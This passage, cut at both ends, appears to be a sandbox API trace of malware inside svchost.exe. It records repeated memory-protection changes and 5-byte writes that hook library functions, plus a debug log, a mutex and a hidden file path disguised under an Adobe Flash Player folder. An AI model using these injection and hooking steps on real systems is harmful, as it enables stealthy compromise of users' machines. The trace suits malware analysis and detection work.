hProcess=0xffffffff, lpAddress=0x7413f5b0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.627] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x741611e0, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x74161000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x168000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.628] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x741611e0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.628] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x741611e0, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.628] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c0047, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.628] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x741611e0, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.628] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x741611e0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.628] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7416d7e0, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x7416d000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x15c000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.628] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7416d7e0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.628] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7416d7e0, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.629] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c0051, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.629] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7416d7e0, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.629] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7416d7e0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.629] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7416ff30, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x7416f000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x15a000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.629] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7416ff30, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.629] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7416ff30, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.629] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c005b, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.629] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7416ff30, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.630] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7416ff30, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.630] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x74144320, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x74144000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x185000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.630] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74144320, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.630] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74144320, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.630] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c0065, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.630] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74144320, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.630] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74144320, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.630] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x74172410, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x74172000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x157000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.631] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74172410, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.631] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74172410, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.631] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c006f, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.631] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74172410, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.631] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74172410, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.631] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x74250b80, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x74250000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x79000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.631] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74250b80, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.631] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74250b80, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.631] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c0079, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.632] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x74250b80, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.632] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x74250b80, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.632] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x741b9fd0, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x741b9000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x110000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.632] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x741b9fd0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.632] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x741b9fd0, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.632] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c0083, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.632] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x741b9fd0, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.633] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x741b9fd0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.660] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7416acb0, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x7416a000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x15f000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.660] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7416acb0, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.660] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7416acb0, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.660] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c008d, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.660] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7416acb0, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.661] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7416acb0, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.661] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7418b730, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x7418b000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x13e000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.661] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7418b730, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.661] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7418b730, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.661] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c0097, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.661] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7418b730, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.661] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7418b730, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.661] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7418b650, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x7418b000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x13e000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.662] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7418b650, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.662] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7418b650, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.662] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c00a1, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.662] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7418b650, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.662] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7418b650, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.662] VirtualQueryEx (in: hProcess=0xffffffff, lpAddress=0x7414cb20, lpBuffer=0x65f558, dwLength=0x1c | out: lpBuffer=0x65f558*(BaseAddress=0x7414c000, AllocationBase=0x740f0000, AllocationProtect=0x80, RegionSize=0x17d000, State=0x1000, Protect=0x20, Type=0x1000000)) returned 0x1c [0064.662] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7414cb20, dwSize=0x1e, flNewProtect=0x40, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x20) returned 1 [0064.662] ReadProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7414cb20, lpBuffer=0x65f588, nSize=0x1e, lpNumberOfBytesRead=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesRead=0x0) returned 1 [0064.663] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x8c00ab, lpBuffer=0x65f588*, nSize=0xa, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.663] WriteProcessMemory (in: hProcess=0xffffffff, lpBaseAddress=0x7414cb20, lpBuffer=0x65f588*, nSize=0x5, lpNumberOfBytesWritten=0x0 | out: lpBuffer=0x65f588*, lpNumberOfBytesWritten=0x0) returned 1 [0064.663] VirtualProtectEx (in: hProcess=0xffffffff, lpAddress=0x7414cb20, dwSize=0x1e, flNewProtect=0x20, lpflOldProtect=0x65f584 | out: lpflOldProtect=0x65f584*=0x40) returned 1 [0064.663] ConvertSidToStringSidW () returned 0x1 [0064.664] GetCommandLineW () returned="C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs" [0064.664] GetLastError () returned 0x0 [0064.664] GetLocalTime (in: lpSystemTime=0x65f5b8 | out: lpSystemTime=0x65f5b8*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xf, wMinute=0x2a, wSecond=0x1b, wMilliseconds=0x49)) [0064.665] GetCurrentThreadId () returned 0xc5c [0064.665] GetCurrentProcessId () returned 0xc54 [0064.665] wvnsprintfW (in: pszDest=0x4c01268, cchDest=250, pszFmt="[%02u.%02u.%4u %02u:%02u:%02u] ver=%u.%u.%u, log=0x%04X, PID=0x%04X, TID=0x%04X, LE=%u(0x%X)\r\n%S: ", arglist=0x65f55c | out: pszDest="[13.10.2016 15:42:27] ver=2.2.5, log=0x0003, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: ") returned 86 [0064.665] wvnsprintfW (in: pszDest=0x4c01314, cchDest=1962, pszFmt="Initialized successfully:\r\nVersion: %u.%u.%u\r\nIntegrity level: %u\r\ncoreData.proccessFlags: 0x%08X\r\nFull path: %s\r\nCommand line: %s\r\nSID: %s\r\nbaseConfig hash=0x%08X\r\ncoreData.modules.current=0x%p\r\ncoreData.initFlags=0x%x", arglist=0x65f5d8 | out: pszDest="Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000205\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x005B0000\r\ncoreData.initFlags=0x3") returned 340 [0064.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:27] ver=2.2.5, log=0x0003, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000205\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x005B0000\r\ncoreData.initFlags=0x3", cchWideChar=426, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 426 [0064.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:27] ver=2.2.5, log=0x0003, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000205\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x005B0000\r\ncoreData.initFlags=0x3", cchWideChar=426, lpMultiByteStr=0x4c02278, cbMultiByte=427, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:27] ver=2.2.5, log=0x0003, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000205\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x005B0000\r\ncoreData.initFlags=0x3", lpUsedDefaultChar=0x0) returned 426 [0064.665] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:27] ver=2.2.5, log=0x0003, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000205\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x005B0000\r\ncoreData.initFlags=0x3", cchWideChar=426, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 426 [0064.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="[13.10.2016 15:42:27] ver=2.2.5, log=0x0003, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000205\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x005B0000\r\ncoreData.initFlags=0x3", cchWideChar=426, lpMultiByteStr=0x4c024e0, cbMultiByte=427, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="[13.10.2016 15:42:27] ver=2.2.5, log=0x0003, PID=0x0C54, TID=0x0C5C, LE=0(0x0)\r\nINFO: Initialized successfully:\r\nVersion: 2.2.5\r\nIntegrity level: 3\r\ncoreData.proccessFlags: 0x00000205\r\nFull path: C:\\Windows\\SysWOW64\\svchost.exe\r\nCommand line: C:\\Windows\\SysWOW64\\svchost.exe -k netsvcs\r\nSID: S-1-5-21-3582695476-958571460-1978946630-1000\r\nbaseConfig hash=0x6BD73BCF\r\ncoreData.modules.current=0x005B0000\r\ncoreData.initFlags=0x3", lpUsedDefaultChar=0x0) returned 426 [0064.666] GetSystemTime (in: lpSystemTime=0x65f1a8 | out: lpSystemTime=0x65f1a8*(wYear=0x7e0, wMonth=0xa, wDayOfWeek=0x4, wDay=0xd, wHour=0xd, wMinute=0x2a, wSecond=0x1b, wMilliseconds=0x58)) [0064.666] SystemTimeToFileTime (in: lpSystemTime=0x65f1a8, lpFileTime=0x65f198 | out: lpFileTime=0x65f198) returned 1 [0064.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0064.667] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="svchost.exe", cchWideChar=11, lpMultiByteStr=0x4c02470, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="svchost.exe", lpUsedDefaultChar=0x0) returned 11 [0064.667] GetModuleHandleA (lpModuleName="secur32.dll") returned 0x0 [0064.667] LoadLibraryA (lpLibFileName="secur32.dll") returned 0x74350000 [0064.671] LoadLibraryA (lpLibFileName="SSPICLI") returned 0x744e0000 [0064.672] GetProcAddress (hModule=0x744e0000, lpProcName="GetUserNameExW") returned 0x744ec5f0 [0064.672] GetUserNameExW () returned 0x1 [0064.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 27 [0064.674] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", cchWideChar=27, lpMultiByteStr=0x4c02590, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="7ZA1P8WI\\WI2yhmtI onvScY7Pe", lpUsedDefaultChar=0x0) returned 27 [0064.674] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="8A") returned 2 [0064.674] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="00") returned 2 [0064.674] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="00") returned 2 [0064.674] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="00") returned 2 [0064.675] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="B7") returned 2 [0064.675] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="49") returned 2 [0064.675] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="67") returned 2 [0064.675] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="98") returned 2 [0064.675] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="F6") returned 2 [0064.675] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="14") returned 2 [0064.675] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="59") returned 2 [0064.675] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="35") returned 2 [0064.675] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="AA") returned 2 [0064.675] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="3E") returned 2 [0064.675] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="27") returned 2 [0064.675] wvnsprintfW (in: pszDest=0x65ef90, cchDest=6, pszFmt="%02X", arglist=0x65ef6c | out: pszDest="60") returned 2 [0064.675] CreateMutexW (lpMutexAttributes=0x5ce89c, bInitialOwner=0, lpName="8A000000B7496798F6145935AA3E2760") returned 0x154 [0064.676] WaitForSingleObject (hHandle=0x154, dwMilliseconds=0xffffffff) returned 0x0 [0064.676] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x65f044, cbMultiByte=92, lpWideCharStr=0x65ee08, cchWideChar=150 | out: lpWideCharStr="Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoee豞皰") returned 92 [0064.676] PathCombineW (in: pszDest=0x5d12e8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming", pszFile="Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" [0064.676] PathRemoveFileSpecW (in: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player\\1e45a456cb803f4096a6a7598c65e692_8c74eee4-8873-4eb3-9315-336075ff5033.hoe" | out: pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned 1 [0064.677] PathSkipRootW (pszPath="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player") returned="Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Adobe\\Flash Player" [0064.677] GetFileAttributesW (lpFileName="C:\\Users") returned 0x11 [0064.677] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe") returned 0x10 [0064.677] GetFileAttributesW (lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData") returned 0x12 [0064.677] 